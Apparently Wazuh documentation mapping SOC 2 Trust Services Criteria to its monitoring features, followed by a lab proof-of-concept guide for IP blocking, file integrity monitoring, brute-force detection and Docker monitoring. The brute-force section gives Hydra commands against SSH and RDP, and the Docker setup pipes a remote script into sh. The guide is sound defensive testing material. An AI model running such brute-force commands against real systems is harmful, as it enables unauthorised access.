    The TSC additional criteria are an extension of the common criteria. Organizations can use these additional criteria to address precise security requirements not defined by the conventional TSC common criteria.

Wazuh assists with these criteria by performing log collection, file integrity monitoring, configuration assessment, threat detection, vulnerability assessment, and automated threat response.

This document outlines use cases that show how Wazuh helps users comply with the TSC common criteria, and the additional criteria for availability, confidentiality, and processing integrity. We have also created the Using Wazuh for TSC 2017 requirements guide, which complements this document. Please refer to the guide for more details on how Wazuh helps meet TSC requirements.

The following sections outline some of the technical requirements that Wazuh supports:

Common criteria 2.1 (COSO Principle 13)

The TSC common criteria (CC2.1) relate to using relevant information and communication within an organization. It states, "The organization obtains or generates and uses relevant, quality information to support the functioning of internal control”.

This principle emphasizes the importance of accurate and prompt information to manage risks and achieve organizational objectives effectively. It also highlights the need for an efficient communication channel so that information can be conveyed and utilized by the appropriate individuals and departments within the organization. There are four objectives needed to meet this requirement:

  • Identify information requirements: A process is in place to identify the information required and expected to support the functioning of the other components of internal control and the achievement of the entity’s objectives.

  • Capture internal and external sources of data: Information systems capture internal and external sources of data.

  • Process relevant data into information: Information systems process and transform relevant data into information.

  • Maintain quality throughout processing: Information systems produce information that is timely, current, accurate, complete, accessible, protected, verifiable, and retained. Information is reviewed to assess its relevance in supporting the internal control components.

To comply with Principle 13, an entity should have processes in place to identify and gather relevant information, assess the quality of that information, and use it to support proper decision-making, such as internal control activities. It should also establish a functional communication channel to ensure timely information distribution to the appropriate individuals and departments.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Collecting and analyzing logs across multiple endpoints

Wazuh helps meet the COSO Principle 13 (CC2.1) requirement by providing capabilities that generate quality information for the proper functioning of internal control measures. An example is log data analysis. The Wazuh logcollector module retrieves and centralizes log data from different sources, such as operating systems, applications, network devices, and security appliances. Once the log data is collected, Wazuh applies various analysis techniques to extract valuable insights and detect potential security issues. This is done by matching the received data with the Wazuh out of the box decoders and rules.

This use case shows how log data analysis can be used to detect specific events across multiple endpoints. The process below shows how Wazuh groups Threat Hunting for an Ubuntu 22.04 agent.

  1. Click on Threat Hunting in the Wazuh dashboard:

Wazuh dashboard

Check the security events on the dashboard and click on any alert to view more details.

Threat hunting dashboard

The Wazuh ruleset also gives proper labeling to these triggered events. An example is the image below that shows the details for the triggered alert Attached USB Storage with rule ID 81101.

Attached USB storage alert details

Common criteria 3.1 (COSO Principle 6)

The TSC common criteria CC3.1: The principle states, “The entity specifies objectives with sufficient clarity to enable the identification and assessment of risks relating to objectives”. This means that the entity should monitor the effectiveness of internal controls over financial reporting on an ongoing basis. In other words, an entity should have a system in place to regularly assess the effectiveness of its internal controls, identify and address any deficiencies, and make necessary adjustments to ensure that the controls effectively achieve their intended objectives.

This principle is a major component of the COSO framework for internal control and is essential for ensuring the integrity of financial reporting within an entity.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Utilizing Wazuh detection and response capabilities for security monitoring

Wazuh includes several out-of-the-box modules that help meet the COSO Principle 6 CC3.1 requirement. These modules provide capabilities for vulnerability assessment, configuration assessment, threat intelligence, and regulatory compliance, to mention a few. The analysis from these modules can be viewed from the Wazuh dashboard for easy identification and risk assessment.

Using the Wazuh dashboard, you can review events and alerts generated across your environment.

Events and alerts review

Common criteria 5.1 (COSO Principle 10)

The TSC common criteria CC5.1: The principle states, “The entity selects and develops control activities that contribute to the mitigation of risks to the achievement of objectives to acceptable levels.” This means that the organization should design and implement controls appropriate for its specific business environment aligned with its overall goals and objectives. Examples of control activities include policies, authorizations and approvals processes, information management, and physical controls.

One of the points of focus for this criteria is that an effective control framework should include a diverse mix of control activities, considering different approaches to address risks and incorporating a combination of manual and automated, preventive and detective controls.

This principle is a crucial part of the overall control metrics of an organization and is frequently applied in the context of internal control and risk management. It aids organizations in detecting and reducing risks and ensuring compliance with laws and regulations.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Security Configuration Assessment of a monitored endpoint

Wazuh helps meet this aspect of the COSO Principle 10 CC5.1 control activities requirement by providing several modules. One of these modules is the Security Configuration Assessment (SCA) module. This module allows a user to scan system components and configurations to detect misconfigurations that could lead to security issues. The Wazuh SCA module is an example of a detective control for proactively identifying misconfiguration issues for timely remediation.

In this case, we use the SCA module to evaluate a monitored Windows 10 endpoint against the CIS Benchmark for Windows 10. By monitoring and detecting security configuration issues, you can quickly identify and remediate potential security risks, ensuring the security and compliance of your systems. You can track these events and actions on the Wazuh dashboard:

  1. Navigate to the Configuration Assessment module from the Wazuh dashboard. Select the monitored Windows 10 endpoint.

You can see the result of the assessment of the monitored endpoint.

Password assurance checks

Common criteria 6.1

The TSC common criteria CC6.1 states that: “The entity implements logical access security software, infrastructure, and architectures over protected information assets to protect them from security events to meet the entity's objectives”. This control is part of the security category of the TSC requirements. It requires the entity to maintain an inventory of its information assets. It also seeks to define the minimum requirements for the management of logical and physical access to the entity's information systems. These controls are implemented with user authentication, encryption, and asset inventory.

The TSC CC6.1 is a key consideration when assessing the reliability of a system. It demonstrates that the required security precautions have been taken to maintain an entity's security.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Maintaining asset inventory on a Windows endpoint

Wazuh meets the architecture, infrastructure, and security software aspects of the common criteria CC6.1 by providing several modules. One of these is the Syscollector module. In this use case, we show how to use the Wazuh Syscollector module to collect system information on a Windows 11 endpoint. You can use this module to monitor specific components, protocols, services, or applications running on an endpoint.

  1. Open the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf and scroll to the syscollector block to verify that you have the same configuration below:

    <!-- System inventory -->
       <wodle name="syscollector">
         <disabled>no</disabled>
         <interval>1h</interval>
         <scan_on_start>yes</scan_on_start>
         <hardware>yes</hardware>
         <os>yes</os>
         <network>yes</network>
         <packages>yes</packages>
         <ports all="no">yes</ports>
         <processes>yes</processes>
         <users>yes</users>
         <groups>yes</groups>
         <services>yes</services>
         <browser_extensions>yes</browser_extensions>
    
         <!-- Database synchronization settings -->
         <synchronization>
           <max_eps>10</max_eps>
           <integrity_interval>24h</integrity_interval>
         </synchronization>
       </wodle>
    
  2. Navigate to IT Hygiene on the Wazuh dashboard and select your endpoint. You can see details about installed applications, network services, and used ports on the monitored endpoint.

    Agent inventory data

Common criteria 7.1

The TSC common criteria CC7.1 states that: “To meet its objectives, the entity uses detection and monitoring procedures to identify (1) changes to configurations that result in the introduction of new vulnerabilities, and (2) susceptibilities to newly discovered vulnerabilities”. This control indicates the depth and rigor of the evaluation required to be performed on an information asset to monitor changes to the configuration. It ensures that changes do not introduce new vulnerabilities to the system or make it prone to new vulnerabilities.

Evaluation and compliance of an information asset to CC7.1 ensure that the asset is strengthened to a high level of security assurance. CC7.1 facilitates the prevention of misconfiguration flaws and ensures continuous monitoring to quickly identify vulnerabilities.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Monitoring a CentOS endpoint for vulnerabilities

Wazuh helps meet the common criteria CC7.1 by providing the Vulnerability Detection module. This module can uncover vulnerabilities in operating systems and installed applications. It performs a software audit by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability detection module correlates this information with data from the endpoint application inventory.

In this use case, you can see how the Wazuh Vulnerability Detection module detects vulnerabilities on a CentOS 8 endpoint.

  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf. Make sure the module is enabled.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh manager to apply them:

    # systemctl restart wazuh-manager
    
  3. Navigate to the Vulnerability Detection module from the Wazuh dashboard. Select the agent to view its discovered vulnerabilities.

    Agent vulnerabilities

Common criteria 8.1

The TSC common criteria CC8.1 provides a comprehensive and well-recognized technique for evaluating the security of IT products and systems. CC 8.1 defines a set of security requirements and evaluation procedures for IT products, such as software, hardware, and systems, that are intended to be used in a security context. The objective of CC 8.1 is to provide a standardized, objective, and repeatable evaluation process for IT products and to facilitate the development of secure IT products and systems. It states that: “The entity authorizes, designs, develops or acquires, configures, documents, tests, approves, and implements changes to infrastructure, data, software, and procedures to meet its objectives”. The end goal of the common criteria 8.1 is to provide assurance to users of IT products that the product has been independently evaluated and meets a high level of security.

The following use case shows how Wazuh can assist in meeting this objective.

Use case: Monitoring packages installed on an Ubuntu endpoint

Wazuh helps meet the TSC common criteria CC8.1 requirement by providing several modules such as SCA, vulnerability detection, and active response. This use case shows how Wazuh can be used to view installed packages on an Ubuntu 22.04 endpoint.

To carry out this use case, set up a Wazuh server and an Ubuntu 22.04 endpoint with the Wazuh agent installed and connected to the Wazuh server.

  1. Upgrade the Ubuntu endpoint to trigger the installation of packages:

    $ sudo apt upgrade
    
  2. Select Threat Hunting from your Wazuh dashboard.

  3. Ensure the Ubuntu endpoint is selected.

  4. Filter for rule ID 2902.

Rule ID 2902 filtering

Wazuh contributes to the CC8.1 requirement by maintaining an accurate and up-to-date record of the software installed on each monitored agent. This information is vital for understanding the overall system configuration, tracking licenses, and ensuring compliance. Wazuh also integrates with vulnerability assessment tools and databases to identify known vulnerabilities associated with specific software packages. By cross-referencing the package inventory with vulnerability information, Wazuh highlights potential security weaknesses. This information allows organizations to prioritize patching or mitigating vulnerable packages, reducing the risk of exploitation.

The additional criteria

The Trust Service Criteria include an additional set of criteria that complement the COSO principle. These criteria, defined within the introductory section of this document, outline metrics that aim to improve the entity’s internal control process and risk management. They are specific to availability, processing integrity, confidentiality, and privacy. The sections below show the application and use cases for some selected requirements.

Availability - A1.1

The TSC additional criteria for availability A1.1 states that “The entity maintains, monitors, and evaluates current processing capacity and use of system components (infrastructure, data, and software) to manage capacity demand and to enable the implementation of additional capacity to help meet its objectives”. Maintaining the availability of information systems is very important to the business activities of service organizations.

Many service organizations offer outsourced services to their clients and typically have contractual obligations or service-level agreements regarding the services provided. These agreements make it valuable to include TSC requirements regarding availability, as it provides confidence to customers and the organization. It is especially common among data centers and organizations that have service (SaaS) offerings which often include TSC compliance.

The use case below demonstrates how Wazuh assists in meeting this requirement.

Use case: Using Wazuh for system resource monitoring on a Windows endpoint

Wazuh helps to meet the TSC additional criteria for availability A1.1 using a combination of several Wazuh modules. These modules can monitor system resources and performance to create alerts based on custom thresholds to help administrators react to events that impact availability. The modules include command monitoring and system inventory.

Using the Wazuh command monitoring module, we configure the Wazuh agent to run commands to monitor system resources on a Windows Server 2022 endpoint. We also show how to create custom rules to monitor the commands and view the relevant alerts on the Wazuh dashboard.

  1. Add the configuration below to the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf. This monitors the RAM and CPU consumption of the monitored Windows endpoint:

    <wodle name="command">
      <disabled>no</disabled>
      <tag>CPUUsage</tag>
      <command>Powershell -c "@{ winCounter = (Get-Counter '\Processor(_Total)\% Processor Time').CounterSamples[0] } | ConvertTo-Json -compress"</command>
      <interval>1m</interval>
      <ignore_output>no</ignore_output>
      <run_on_start>yes</run_on_start>
      <timeout>0</timeout>
    </wodle>
    
    <wodle name="command">
      <disabled>no</disabled>
      <tag>MEMUsage</tag>
      <command>Powershell -c "@{ winCounter = (Get-Counter '\Memory\Available MBytes').CounterSamples[0] } | ConvertTo-Json -compress"</command>
      <interval>1m</interval>
      <ignore_output>no</ignore_output>
      <run_on_start>yes</run_on_start>
      <timeout>0</timeout>
    </wodle>
    
  2. Launch PowerShell as administrator and restart the Wazuh agent for the changes to take effect:

    > Restart-Service -Name wazuh
    
  3. Create a file performance_monitor.xml in the /var/ossec/etc/rules/ directory on the Wazuh server. Add the custom rules below to trigger alerts on different performance thresholds:

    <group name="WinCounter,">
        <rule id="301000" level="0">
          <decoded_as>json</decoded_as>
          <match>^{"winCounter":</match>
          <description>Windows Performance Counter: $(winCounter.Path).</description>
        </rule>
    
        <rule id="302000" level="3">
          <if_sid>301000</if_sid>
          <field name="winCounter.Path">memory\\available mbytes</field>
          <description>Windows Counter: Available Memory.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="302001" level="5">
          <if_sid>302000</if_sid>
          <field name="winCounter.CookedValue" type="pcre2">^[5-9]\d{2}$</field>
          <description>Windows Counter: Available Memory less than 1GB.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="302002" level="7">
          <if_sid>302000</if_sid>
          <field name="winCounter.CookedValue" type="pcre2">^[1-4]\d{2}$</field>
          <description>Windows Counter: Available Memory less than 500MB.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303000" level="3">
          <if_sid>301000</if_sid>
          <field name="winCounter.Path">processor\S+ processor time</field>
          <description>Windows Counter: CPU Usage.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303001" level="5">
          <if_sid>303000</if_sid>
          <field name="winCounter.CookedValue">^8\d.\d+$</field>
          <description>Windows Counter: CPU Usage above 80%.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303002" level="7">
          <if_sid>303000</if_sid>
          <field name="winCounter.CookedValue">^9\d.\d+$</field>
          <description>Windows Counter CPU Usage above 90%.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    </group>
    

    Where:

    • Rule ID 301000 matches all "Windows Performance Counter" events and is the parent rule for all the other rules.

    • Rule ID 302000 reports the current memory utilization, measured in megabytes.

    • Rule ID 302001 triggers when the available memory is less than 1GB.

    • Rule ID 302002 triggers when the available memory is less than 500MB

    • Rule ID 303000 reports the current CPU utilization, measured in percentage.

    • Rule ID 303001 triggers when the CPU usage is above 80%.

    • Rule ID 303002 triggers when the CPU usage is above 90%.

  4. Restart the Wazuh manager to apply the changes:

    # systemctl restart wazuh-manager
    
  5. Select TSC from the Wazuh dashboard to see the alerts. These alerts are identified with the tag A1.1.

    TSC A1.1 alerts
Processing integrity - PI1.4

The trust service criteria for additional criteria for processing integrity PI1.4 is a set of guidelines that outline the requirements for ensuring the completeness and integrity of the processed data of an entity. It states: "The entity implements policies and procedures to make available or deliver output completely, accurately, and timely in accordance with specifications to meet the entity’s objectives.". The following actions are performed to achieve this:

  • Protect output: Output is protected when stored or delivered, or both, to prevent theft, destruction, corruption, or deterioration that would prevent output from meeting specifications.

  • Distribute output only to intended parties: Output is distributed or made available only to intended parties.

  • Distribute output completely and accurately: Procedures are in place to provide for the completeness, accuracy, and timeliness of distributed output.

  • Create and maintain records of system output activities: Records of system output activities are created and maintained completely and accurately in a timely manner.

The use case below demonstrates how Wazuh assists in meeting this requirement.

Use case: Detecting file changes using the Wazuh File Integrity Monitoring module

This use case shows how Wazuh helps meet the processing integrity PI1.4 requirement by monitoring and reporting file changes using the FIM module. In this scenario, we show how you can configure the Wazuh agent on a Ubuntu 22.04 endpoint to detect changes in the critical_folder directory.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory critical_folder in the /root directory:

    # mkdir /root/critical_folder
    
  3. Create the file special_data.txt in the /root/critical_folder directory and add some content:

    # touch /root/critical_folder/special_data.txt
    # echo "The content in this file must maintain integrity" >> /root/critical_folder/special_data.txt
    
  4. Add the highlighted configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/root/critical_folder</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Modify the file by changing the content of special_data.txt from The content in this file must maintain integrity to A change has occurred:

    # echo "A change has occurred" > /root/critical_folder/special_data.txt
    # cat /root/critical_folder/special_data.txt
    
    A change has occurred
    
  7. Select TSC from the Wazuh dashboard to view the alert with rule ID 550.

    Rule id 550 alert

    The alert is tagged with PI1.4 and other compliance tags with requirements that intersect with this use case.

    Alert tagged PI1.4

Proof of Concept guide

In this section of the documentation, we provide a set of use cases to explore different Wazuh capabilities. We describe how Wazuh can be configured for threat prevention, detection, and response. Each use case represents a real-world scenario that users can deploy using specific configurations.

Preparing your lab environment

The Wazuh solution consists of security agents, which are deployed on monitored endpoints, and the Wazuh central components, which collect and analyze data gathered by the agents.

We recommend that you use virtual machines and take snapshots immediately after setting up the infrastructure. Doing this you can get a clean environment whenever you want to test a new use case. A clean environment is important because it prevents the different tests from interfering with each other.

The diagram below illustrates the architecture of the Wazuh lab environment that is required to test the use cases described in this document.

Wazuh central components

In these use cases, the Wazuh central components (server, indexer, and dashboard) run on one system. This is because you’re monitoring a small scale environment and there’s no need for a distributed architecture.

To install the Wazuh central components on a single system, it’s recommended to use one of the following options:

  • The Quickstart guide: Using this guide, you can install all the components on the same system in approximately 5 minutes.

  • Our preconfigured Virtual Machine: Wazuh provides a pre-built virtual machine image in Open Virtual Appliance (OVA) format. It can be imported to VirtualBox or other OVA-compatible virtualization systems.

Monitored endpoints

The Wazuh agent monitors the following endpoints. Depending on the use case, the endpoints act as victims of an attack, or as malicious actors (attackers).

Endpoint

Operating system (64-bits)

CPU cores

RAM

Disk

Ubuntu

Ubuntu 22.04 LTS

1 vCPU

2 GB

10 GB

RHEL

Red Hat Enterprise Linux 9.0

1 vCPU

2 GB

10 GB

Windows

Windows 11

2 vCPU

4 GB

25 GB

You can see our installation guide for information on how to install the Wazuh agent on these endpoints. You need Internet access to perform some integrations and download the software used in these use cases.

Use cases

Blocking a known malicious actor

In this use case, we demonstrate how to block malicious IP addresses from accessing web resources on a web server. You set up Apache web servers on Ubuntu and Windows endpoints, and try to access them from an RHEL endpoint.

This case uses a public IP reputation database that contains the IP addresses of some malicious actors. An IP reputation database is a collection of IP addresses that have been flagged as malicious. The RHEL endpoint plays the role of the malicious actor here, therefore you add its IP address to the reputation database. Then, configure Wazuh to block the RHEL endpoint from accessing web resources on the Apache web servers for 60 seconds. It’s a way of discouraging attackers from continuing to carry out their malicious activities.

In this use case, you use the Wazuh CDB list and Active Response capabilities.

Infrastructure

Endpoint

Description

RHEL 9.0

Attacker endpoint connecting to the victim's web server on which you use Wazuh CDB list capability to flag its IP address as malicious.

Ubuntu 22.04

Victim endpoint running an Apache 2.4.54 web server. Here, you use the Wazuh Active Response module to automatically block connections from the attacker endpoint.

Windows 11

Victim endpoint running an Apache 2.4.54 web server. Here, you use the Wazuh Active Response module to automatically block connections from the attacker endpoint.

Configuration
Ubuntu endpoint

Perform the following steps to install an Apache web server and monitor its logs with the Wazuh agent.

  1. Update local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If the firewall is enabled, modify the firewall to allow external access to web ports. Skip this step if the firewall is disabled:

    $ sudo ufw status
    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    
  3. Check the status of the Apache service to verify that the web server is running:

    $ sudo systemctl status apache2
    
  4. Use the curl command or open http://<UBUNTU_IP> in a browser to view the Apache landing page and verify the installation:

    $ curl http://<UBUNTU_IP>
    
  5. Add the following to /var/ossec/etc/ossec.conf file to configure the Wazuh agent and monitor the Apache access logs:

    <localfile>
      <log_format>syslog</log_format>
      <location>/var/log/apache2/access.log</location>
    </localfile>
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Windows endpoint
Install the Apache web server

Perform the following steps to install and configure an Apache web server.

  1. Install the latest Visual C++ Redistributable package.

  2. Download the Apache web server Win64 ZIP installation file. This is an already compiled binary for Windows operating systems.

  3. Unzip the contents of the Apache web server zip file and copy the extracted Apache24 folder to the C: directory.

  4. Navigate to the C:\Apache24\bin\ folder and run the following command in a PowerShell terminal with administrator privileges:

    > .\httpd.exe
    

    The first time you run the Apache binary a Windows Defender Firewall pops up.

  5. Click on Allow Access. This allows the Apache HTTP server to communicate on your private or public networks depending on your network setting. It creates an inbound rule in your firewall to allow incoming traffic on port 80.

  6. Open http://<WINDOWS_IP> in a browser to view the Apache landing page and verify the installation. Also, verify that this URL can be reached from the attacker endpoint.

Configure the Wazuh agent

Perform the steps below to configure the Wazuh agent to monitor Apache web server logs.

  1. Add the following to C:\Program Files (x86)\ossec-agent\ossec.conf to configure the Wazuh agent and monitor the Apache access logs:

    <localfile>
      <log_format>syslog</log_format>
      <location>C:\Apache24\logs\access.log</location>
    </localfile>
    
  2. Restart the Wazuh agent in a PowerShell terminal with administrator privileges to apply the changes:

    > Restart-Service -Name wazuh
    
Wazuh server

You need to perform the following steps on the Wazuh server to add the IP address of the RHEL endpoint to a CDB list, and then configure rules and Active Response.

Download the utilities and configure the CDB list
  1. Install the wget utility to download the necessary artifacts using the command line interface:

    $ sudo yum update && sudo yum install -y wget
    
  2. Download the Alienvault IP reputation database:

    $ sudo wget https://iplists.firehol.org/files/alienvault_reputation.ipset -O /var/ossec/etc/lists/alienvault_reputation.ipset
    
  3. Append the IP address of the attacker endpoint to the IP reputation database. Replace <ATTACKER_IP> with the RHEL IP address in the command below:

    $ sudo echo "<ATTACKER_IP>" >> /var/ossec/etc/lists/alienvault_reputation.ipset
    
  4. Download a script to convert from the .ipset format to the .cdb list format:

    $ sudo wget https://wazuh.com/resources/iplist-to-cdblist.py -O /tmp/iplist-to-cdblist.py
    
  5. Convert the alienvault_reputation.ipset file to a .cdb format using the previously downloaded script:

    $ sudo /var/ossec/framework/python/bin/python3 /tmp/iplist-to-cdblist.py /var/ossec/etc/lists/alienvault_reputation.ipset /var/ossec/etc/lists/blacklist-alienvault
    
  6. Optional: Remove the alienvault_reputation.ipset file and the iplist-to-cdblist.py script, as they are no longer needed:

    $ sudo rm -rf /var/ossec/etc/lists/alienvault_reputation.ipset
    $ sudo rm -rf /tmp/iplist-to-cdblist.py
    
  7. Assign the right permissions and ownership to the generated file:

    $ sudo chown wazuh:wazuh /var/ossec/etc/lists/blacklist-alienvault
    
Configure the Active Response module to block the malicious IP address
  1. Add a custom rule to trigger a Wazuh active response script. Do this in the Wazuh server /var/ossec/etc/rules/local_rules.xml custom ruleset file:

    <group name="attack,">
      <rule id="100100" level="10">
        <if_group>web|attack|attacks</if_group>
        <list field="srcip" lookup="address_match_key">etc/lists/blacklist-alienvault</list>
        <description>IP address found in AlienVault reputation database.</description>
      </rule>
    </group>
    
  2. Edit the Wazuh server /var/ossec/etc/ossec.conf configuration file and add the etc/lists/blacklist-alienvault list to the <ruleset> section:

    <ossec_config>
      <ruleset>
        <!-- Default ruleset -->
        <decoder_dir>ruleset/decoders</decoder_dir>
        <rule_dir>ruleset/rules</rule_dir>
        <rule_exclude>0215-policy_rules.xml</rule_exclude>
        <list>etc/lists/audit-keys</list>
        <list>etc/lists/amazon/aws-eventnames</list>
        <list>etc/lists/security-eventchannel</list>
        <list>etc/lists/blacklist-alienvault</list>
    
        <!-- User-defined ruleset -->
        <decoder_dir>etc/decoders</decoder_dir>
        <rule_dir>etc/rules</rule_dir>
      </ruleset>
    
    </ossec_config>
    
  3. Add the Active Response block to the Wazuh server /var/ossec/etc/ossec.conf file:

    For the Ubuntu endpoint

    The firewall-drop command integrates with the Ubuntu local iptables firewall and drops incoming network connection from the attacker endpoint for 60 seconds:

    <ossec_config>
      <active-response>
        <disabled>no</disabled>
        <command>firewall-drop</command>
        <location>local</location>
        <rules_id>100100</rules_id>
        <timeout>60</timeout>
      </active-response>
    </ossec_config>
    

    For the Windows endpoint

    The active response script uses the netsh command to block the attacker's IP address on the Windows endpoint. It runs for 60 seconds:

    <ossec_config>
      <active-response>
        <disabled>no</disabled>
        <command>netsh</command>
        <location>local</location>
        <rules_id>100100</rules_id>
        <timeout>60</timeout>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Access any of the web servers from the RHEL endpoint using the corresponding IP address. Replace <WEBSERVER_IP> with the appropriate value and execute the following command from the attacker endpoint:

    $ curl http://<WEBSERVER_IP>
    

The attacker endpoint connects to the victim's web servers the first time. After the first connection, the Wazuh Active Response module temporarily blocks any successive connection to the web servers for 60 seconds.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Ubuntu - rule.id:(651 OR 100100)

  • Windows - rule.id:(657 OR 100100)

File integrity monitoring

File Integrity Monitoring (FIM) helps in auditing sensitive files and meeting regulatory compliance requirements. Wazuh has an inbuilt FIM module that monitors file system changes to detect the creation, modification, and deletion of files.

This use case uses the Wazuh FIM module to detect changes in monitored directories on Ubuntu and Windows endpoints. The Wazuh FIM module enriches alert data by fetching information about the user and process that made the changes using who-data audit.

Infrastructure

Endpoint

Description

Ubuntu 22.04

The Wazuh FIM module monitors a directory on this endpoint to detect file creation, changes, and deletion.

Windows 11

The Wazuh FIM module monitors a directory on this endpoint to detect file creation, changes, and deletion.

Configuration
Ubuntu endpoint

Perform the following steps to configure the Wazuh agent to monitor filesystem changes in the /root directory.

  1. Edit the Wazuh agent /var/ossec/etc/ossec.conf configuration file. Add the directories for monitoring within the <syscheck> block. For this use case, you configure Wazuh to monitor the /root directory. To get additional information about the user and process that made the changes, enable who-data audit:

    <directories check_all="yes" report_changes="yes" realtime="yes">/root</directories>
    

    Note

    You can also configure any path of your choice in the <directories> block.

  2. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Windows endpoint

Take the following steps to configure the Wazuh agent to monitor filesystem changes in the C:\Users\Administrator\Desktop directory.

  1. Edit the C:\Program Files (x86)\ossec-agent\ossec.conf configuration file on the monitored Windows endpoint. Add the directories for monitoring within the <syscheck> block. For this use case, you configure Wazuh to monitor the C:\Users\Administrator\Desktop directory. To get additional information about the user and process that made the changes, enable who-data audit:

    <directories check_all="yes" report_changes="yes" realtime="yes">C:\Users\<USER_NAME>\Desktop</directories>
    

    Note

    You can also configure any path of your choice in the <directories> block.

  2. Restart the Wazuh agent using Powershell with administrator privileges to apply the changes:

    > Restart-Service -Name wazuh
    

As an alternative to local configurations on the Wazuh agents, you can centrally configure groups of agents.

Test the configuration
  1. Create a text file in the monitored directory then wait for 5 seconds.

  2. Add content to the text file and save it. Wait for 5 seconds.

  3. Delete the text file from the monitored directory.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the File Integrity Monitoring module and add the filters in the search bar to query the alerts:

  • Ubuntu - rule.id: is one of 550,553,554

  • Windows - rule.id: is one of 550,553,554

Detecting a brute-force attack

Brute-forcing is a common attack vector that threat actors use to gain unauthorized access to endpoints and services. Services like SSH on Linux endpoints and RDP on Windows endpoints are usually prone to brute-force attacks. Wazuh identifies brute-force attacks by correlating multiple authentication failure events.

The section on Blocking attacks with Active Response describes how to configure an active response to block the IP address of an attacker. In this use case, we show how Wazuh detects brute-force attacks on RHEL and Windows endpoints.

Infrastructure

Endpoint

Description

Ubuntu 22.04

Attacker endpoint that performs brute-force attacks. It’s required to have an SSH client installed on this endpoint.

RHEL 9.0

Victim endpoint of SSH brute-force attacks. It’s required to have an SSH server installed and enabled on this endpoint.

Windows 11

Victim endpoint of RDP brute-force attacks. It’s required to enable RDP on this endpoint.

Configuration

Perform the following steps to configure the Ubuntu endpoint. This allows performing authentication failure attempts on the monitored RHEL and Windows endpoints.

  1. On the attacker endpoint, install Hydra and use it to execute the brute-force attack:

    $ sudo apt update
    $ sudo apt install -y hydra
    
Attack emulation
  1. Create a text file with 10 random passwords.

  2. Run Hydra from the attacker endpoint to execute brute-force attacks against the RHEL endpoint. To do this, replace <RHEL_IP> with the IP address of the RHEL endpoint and run the command below:

    $ sudo hydra -l badguy -P <PASSWD_LIST.txt> <RHEL_IP> ssh
    
  3. Run Hydra from the attacker endpoint to execute brute-force attacks against the Windows endpoint. To do this, replace <WINDOWS_IP> with the IP address of the Windows endpoint and run the command below:

    $ sudo hydra -l badguy -P <PASSWD_LIST.txt> rdp://<WINDOWS_IP>
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Linux - rule.id:(5551 OR 5712). Other related rules are 5710, 5711, 5716, 5720, 5503, 5504.

  • Windows - rule.id:(60122 OR 60204)

Monitoring Docker events

Docker automates the deployment of different applications inside software containers. The Wazuh module for Docker identifies security incidents across containers and alerts in real-time. In this use case, you configure Wazuh to monitor Docker events on an Ubuntu endpoint hosting Docker containers.

See the Monitoring container activity section of the documentation to learn more about monitoring Docker and the docker-listener module.

Infrastructure

Endpoint

Description

Ubuntu 22.04

This is the Docker host where you create and delete containers.

Configuration

Perform the following steps to install Docker on the Ubuntu endpoint and configure Wazuh to monitor Docker events.

  1. Install Python and pip:

    # sudo apt install python3 python3-pip
    
  2. Upgrade pip:

    # pip3 install --upgrade pip
    
  3. Install Docker and Python Docker Library:

    $ curl -sSL https://get.docker.com/ | sh
    $ sudo pip3 install docker==7.1.0 urllib3==1.26.20 requests==2.32.2
    
  4. Edit the Wazuh agent configuration file /var/ossec/etc/ossec.conf and add this block to enable the docker-listener module:

    <ossec_config>
      <wodle name="docker-listener">
        <interval>10m</interval>
        <attempts>5</attempts>
        <run_on_start>yes</run_on_start>
        <disabled>no</disabled>
      </wodle>
    </ossec_config>
    
  5. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Test the configuration

Perform several Docker activities like pulling a Docker image, starting an instance, running some other Docker commands, and then deleting the container.

